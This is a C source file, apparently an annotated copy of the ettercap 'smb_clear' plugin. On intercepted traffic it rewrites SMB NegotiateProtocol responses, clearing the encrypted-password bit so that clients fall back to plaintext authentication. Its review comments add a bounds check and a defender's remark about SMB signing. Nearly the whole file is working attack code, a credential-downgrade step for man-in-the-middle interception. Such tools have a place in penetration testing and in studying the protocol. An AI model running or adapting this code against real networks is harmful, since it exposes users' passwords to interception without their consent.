/*
    smb_clear -- ettercap plugin -- Tries to force SMB cleartext auth.

    Copyright (C) ALoR & NaGA

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

*/
21
22
23 #include <ec.h> /* required for global variables */
24 #include <ec_plugins.h> /* required for plugin ops */
25 #include <ec_packet.h>
26 #include <ec_hook.h>
27
28
/*
 * SMB header as overlaid directly on the packet bytes by parse_smb().
 *
 * With 1-byte u_char and 2-byte u_short the fields add up to 32 bytes
 * and every u_short sits at an even offset, so no compiler padding is
 * expected; parse_smb() relies on sizeof(SMB_header) to find the data
 * that follows the header, so any change here moves that offset.
 *
 * NOTE(review): the field names suggest the classic 32-byte SMB header
 * (protocol id, command, status, flags, flags2, with pid_high, signature
 * and reserved folded into pad[6]) -- confirm against the dissector that
 * raises HOOK_PROTO_SMB before relying on any individual field.
 */
typedef struct {
   u_char proto[4];   /* protocol identifier */
   u_char cmd;        /* command code */
   u_char err[4];     /* status / error code */
   u_char flags1;
   u_short flags2;
   u_short pad[6];    /* 12 bytes this plugin does not interpret */
   u_short tid, pid, uid, mid;
} SMB_header;
38
/*
 * NetBIOS session service header (4 bytes: message type, flags,
 * 16-bit length) as overlaid on the start of the SMB payload.
 * parse_smb() only steps over it to reach the SMB header; the len
 * field is never read here, so its byte order is not assumed.
 */
typedef struct {
   u_char mesg;    /* message type */
   u_char flags;
   u_short len;    /* length of the following SMB message (unused here) */
} NetBIOS_header;
44
45
46 /* protos */
/* ettercap entry point: registers smb_clear_ops (defined below) */
int plugin_load(void *);

/* plugin_ops activation / deactivation callbacks */
static int smb_clear_init(void *);
static int smb_clear_fini(void *);

/* HOOK_PROTO_SMB handler installed by smb_clear_init() */
static void parse_smb(struct packet_object *po);
52
53 /* plugin operations */
54
/*
 * Plugin descriptor handed to plugin_register() by plugin_load().
 * Exported (non-static) so the plugin loader can reach it.
 */
struct plugin_ops smb_clear_ops = {
   .ettercap_version = EC_VERSION,                    /* MUST be the global EC_VERSION */
   .name             = "smb_clear",                   /* plugin name */
   .version          = "1.0",                         /* plugin version */
   .info             = "Tries to force SMB cleartext auth", /* short description, max 50 chars */
   .init             = smb_clear_init,                /* activation */
   .fini             = smb_clear_fini,                /* deactivation */
};
69
70 /**********************************************************/
71
72 /* this function is called on plugin load */
/*
 * Called by ettercap when the plugin is loaded.
 *
 * handle   opaque loader handle, passed straight through.
 * Returns whatever plugin_register() returns for smb_clear_ops.
 */
int plugin_load(void *handle)
{
   struct plugin_ops *ops = &smb_clear_ops;

   return plugin_register(handle, ops);
}
77
78 /******************* STANDARD FUNCTIONS *******************/
79
/*
 * Activation callback (plugin_ops.init).
 *
 * The plugin rewrites forwarded packets, so it refuses to start when
 * ettercap runs in unoffensive mode; otherwise it announces itself and
 * attaches parse_smb() to HOOK_PROTO_SMB.
 *
 * dummy   unused.
 * Returns PLUGIN_RUNNING once the hook is installed, PLUGIN_FINISHED
 * when the plugin cannot operate.
 */
static int smb_clear_init(void *dummy)
{
   (void) dummy;

   if (!EC_GBL_OPTIONS->unoffensive) {
      USER_MSG("smb_clear: plugin running...\n");
      hook_add(HOOK_PROTO_SMB, parse_smb);
      return PLUGIN_RUNNING;
   }

   /* packet modification is not possible in unoffensive mode */
   INSTANT_USER_MSG("smb_clear: plugin doesn't work in UNOFFENSIVE mode\n");
   return PLUGIN_FINISHED;
}
96
97
/*
 * Deactivation callback (plugin_ops.fini): logs the shutdown and
 * detaches parse_smb() from HOOK_PROTO_SMB.
 *
 * dummy   unused.
 * Returns PLUGIN_FINISHED unconditionally.
 */
static int smb_clear_fini(void *dummy)
{
   (void) dummy;

   USER_MSG("smb_clear: plugin terminated...\n");
   hook_del(HOOK_PROTO_SMB, parse_smb);

   return PLUGIN_FINISHED;
}
108
109 /*********************************************************/
110
/* Clear the encryption bit in the Security Mode field of the NegotiateProtocol response */
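/*
 * HOOK_PROTO_SMB callback: clears the "encrypted passwords" bit (0x02)
 * in the Security Mode byte of a NegotiateProtocol response so that the
 * client is offered plaintext authentication instead.
 *
 * po   packet delivered by the hook.  DATA.data is expected to hold a
 *      NetBIOS session header, the SMB header and then the negotiate
 *      response body; ptr[3] is treated as the Security Mode byte
 *      (WordCount, 2-byte DialectIndex, SecurityMode).
 *      NOTE(review): that is the NT LM 0.12 layout -- confirm the
 *      dissector only raises this hook for that dialect, as other
 *      dialects place the byte elsewhere.
 *
 * Returns nothing.  When the bit was set the packet is rewritten in
 * place, logged, and marked PO_MODIFIED so that the altered copy is the
 * one forwarded.
 *
 * Defender's note: the rewrite happens to a packet in transit, so the
 * forwarded response no longer matches what the server sent; session
 * integrity protection (SMB signing) or a client that refuses plaintext
 * passwords presumably leaves the change without effect -- this code
 * does not check for either.
 */
static void parse_smb(struct packet_object *po)
{
   SMB_header *smb;
   NetBIOS_header *NetBIOS;
   u_char *ptr;
   char tmp[MAX_ASCII_ADDR_LEN];

   /* It is pointless to modify packets that won't be forwarded */
   if (!(po->flags & PO_FORWARDABLE))
      return;

   /*
    * Bounds check before touching the payload: ptr[3] lies
    * sizeof(NetBIOS_header) + sizeof(SMB_header) + 3 bytes into
    * DATA.data, and the original code read and wrote it without
    * consulting DATA.len, so a truncated or malformed segment was
    * accessed out of bounds.
    */
   if ((size_t)po->DATA.len < sizeof(NetBIOS_header) + sizeof(SMB_header) + 4)
      return;

   /* Catch netbios and smb headers */
   NetBIOS = (NetBIOS_header *)po->DATA.data;
   smb = (SMB_header *)(NetBIOS + 1);
   /* Let's go to the data */
   ptr = (u_char *)(smb + 1);

   /* According to the Hook Point we are sure that this is
    * a NegotiateProtocol response packet.
    * Now we can change the Security Mode
    * 010 (encrypted) 000 (plaintext)
    */
   if (ptr[3] & 2) {
      ptr[3] ^= 2;
      /* tmp is reused: ip_addr_ntoa() presumably writes into it and
       * returns it, so the message is emitted in two calls */
      USER_MSG("smb_clear: Forced SMB clear text auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp));
      USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp));
      po->flags |= PO_MODIFIED;
   }
}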
141
142 /* EOF */
143
144 // vim:ts=3:expandtab
145
146